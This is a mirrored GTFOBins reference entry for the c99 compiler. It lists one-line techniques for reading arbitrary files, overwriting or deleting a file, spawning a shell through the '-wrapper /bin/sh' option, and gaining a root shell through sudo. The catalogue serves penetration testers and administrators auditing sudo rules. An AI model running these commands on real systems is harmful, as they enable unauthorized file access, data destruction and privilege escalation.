mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
16 lines
327 B
Markdown
16 lines
327 B
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
c99 -x c -E "$LFILE"
|
|
file-write: # XXX this should be file-delete
|
|
- code: |
|
|
LFILE=file_to_delete
|
|
c99 -xc /dev/null -o $LFILE
|
|
shell:
|
|
- code: c99 -wrapper /bin/sh,-s .
|
|
sudo:
|
|
- code: sudo c99 -wrapper /bin/sh,-s .
|
|
---
|